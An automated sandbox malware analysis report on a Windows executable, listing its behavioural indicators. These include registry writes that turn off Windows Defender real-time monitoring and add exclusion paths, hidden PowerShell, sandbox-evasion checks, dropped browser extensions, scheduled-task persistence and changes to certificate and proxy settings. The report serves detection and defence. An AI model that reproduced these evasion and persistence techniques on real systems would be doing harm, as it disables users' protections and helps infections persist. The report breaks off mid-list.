Analysis
-
max time kernel
92s -
max time network
98s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
04-06-2024 01:01
Static task
static1
Behavioral task
behavioral1
Sample
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
Resource
win7-20240508-en
General
-
Target
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
-
Size
7.3MB
-
MD5
0c9f3e28ab69a267a1fff9fe9ae9f516
-
SHA1
1cf6dbc3e6e3ee82254a201dc9c87a12f08c1e31
-
SHA256
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a
-
SHA512
dc273d9860b8610b338cbfa0c922b7c4a9f6b68308957d2dea0d2124bd659ec0b04781321be3a3f66bc22d02992d8347c386bcceffe6fe49b58ae295e4154a27
-
SSDEEP
98304:91OC/3dy4gMqA3Varui/uMoMm1/df1kj+wIL7RyLGLlSjAzfC0SitAnoVB28nXNP:91OCPjobQ/R7we7E3uSvn7e9dkzrrza
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 24 1796 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1968 powershell.EXE 1696 powershell.exe 2452 powershell.exe 2940 powershell.EXE 996 powershell.EXE 2796 powershell.exe 1804 powershell.exe 3060 powershell.exe 2628 powershell.exe 2340 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
fFRTFEY.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\International\Geo\Nation fFRTFEY.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exertuESBK.exefFRTFEY.exepid process 2072 Install.exe 2556 Install.exe 1252 rtuESBK.exe 2232 fFRTFEY.exe -
Loads dropped DLL 23 IoCs
Processes:
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exeInstall.exeInstall.exeWerFault.exerundll32.exeWerFault.exeWerFault.exepid process 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 2072 Install.exe 2072 Install.exe 2072 Install.exe 2072 Install.exe 2556 Install.exe 2556 Install.exe 2556 Install.exe 740 WerFault.exe 740 WerFault.exe 740 WerFault.exe 1796 rundll32.exe 1796 rundll32.exe 1796 rundll32.exe 1796 rundll32.exe 2620 WerFault.exe 2620 WerFault.exe 2620 WerFault.exe 2620 WerFault.exe 2620 WerFault.exe 2416 WerFault.exe 2416 WerFault.exe 2416 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
fFRTFEY.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json fFRTFEY.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json fFRTFEY.exe -
Drops file in System32 directory 27 IoCs
Processes:
rtuESBK.exepowershell.exefFRTFEY.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.EXEdescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini rtuESBK.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA fFRTFEY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F fFRTFEY.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat fFRTFEY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA fFRTFEY.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol fFRTFEY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rtuESBK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 fFRTFEY.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rtuESBK.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F fFRTFEY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 fFRTFEY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 fFRTFEY.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rtuESBK.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 fFRTFEY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fFRTFEY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA fFRTFEY.exe -
Drops file in Program Files directory 13 IoCs
Processes:
fFRTFEY.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fFRTFEY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi fFRTFEY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja fFRTFEY.exe File created C:\Program Files (x86)\hsUwQAlMU\ooqeYQm.xml fFRTFEY.exe File created C:\Program Files (x86)\dlfHiRefefjU2\DddVYemUEJcIT.dll fFRTFEY.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\Mhntkzs.dll fFRTFEY.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\fuQywmc.xml fFRTFEY.exe File created C:\Program Files (x86)\hsUwQAlMU\dVeUJI.dll fFRTFEY.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak fFRTFEY.exe File created C:\Program Files (x86)\dlfHiRefefjU2\nHvRqKk.xml fFRTFEY.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\gnvvBcW.xml fFRTFEY.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\pXqEjwY.dll fFRTFEY.exe File created C:\Program Files (x86)\ZEkGlaTFWGUn\OUlOGAj.dll fFRTFEY.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job schtasks.exe File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job schtasks.exe File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job schtasks.exe File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 740 1252 WerFault.exe rtuESBK.exe 2620 2556 WerFault.exe Install.exe 2416 2232 WerFault.exe fFRTFEY.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2348 schtasks.exe 2424 schtasks.exe 2020 schtasks.exe 276 schtasks.exe 2084 schtasks.exe 2628 schtasks.exe 2792 schtasks.exe 2760 schtasks.exe 1992 schtasks.exe 1852 schtasks.exe 900 schtasks.exe 2832 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
fFRTFEY.exerundll32.exewscript.exertuESBK.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f001e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings fFRTFEY.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EF906BB7-9A9F-4A1A-A1DD-64B7F1E658EE}\WpadDecisionReason = "1" fFRTFEY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EF906BB7-9A9F-4A1A-A1DD-64B7F1E658EE}\WpadDecision = "0" fFRTFEY.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f001e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" fFRTFEY.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached rtuESBK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates fFRTFEY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-71-87-d7-33-e6\WpadDecision = "0" fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs fFRTFEY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-71-87-d7-33-e6\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EF906BB7-9A9F-4A1A-A1DD-64B7F1E658EE}\b2-71-87-d7-33-e6 fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs fFRTFEY.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rtuESBK.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-71-87-d7-33-e6\WpadDecisionTime = b0c510031bb6da01 fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates fFRTFEY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot fFRTFEY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-71-87-d7-33-e6\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0de6adb1ab6da01 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs fFRTFEY.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" rtuESBK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-71-87-d7-33-e6 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-71-87-d7-33-e6\WpadDecisionTime = b0c510031bb6da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root fFRTFEY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections fFRTFEY.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exefFRTFEY.exepowershell.exepowershell.exepid process 2628 powershell.exe 2628 powershell.exe 2628 powershell.exe 2452 powershell.exe 2340 powershell.exe 2340 powershell.exe 2340 powershell.exe 2940 powershell.EXE 2940 powershell.EXE 2940 powershell.EXE 1968 powershell.EXE 1968 powershell.EXE 1968 powershell.EXE 1696 powershell.exe 996 powershell.EXE 996 powershell.EXE 996 powershell.EXE 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 1804 powershell.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 3060 powershell.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 